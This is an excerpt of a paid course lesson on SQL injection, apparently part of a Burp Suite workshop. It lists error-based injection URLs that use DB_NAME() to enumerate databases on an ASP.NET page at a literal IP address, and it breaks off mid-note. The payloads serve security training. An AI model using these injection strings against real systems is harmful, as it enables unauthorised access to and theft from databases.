C1L4: SQL Injection

Please purchase the course before starting the lesson.

https://s3.amazonaws.com/infosecaddictsfiles/1-Intro_To_SQL_Intection.pptx Another quick way to test for SQLI is to remove the paramter value Error-Based SQL Injection http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))-- http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))-- http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))-- http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))-- http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))-- http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" [...]

Back to: Burp Suite Workshop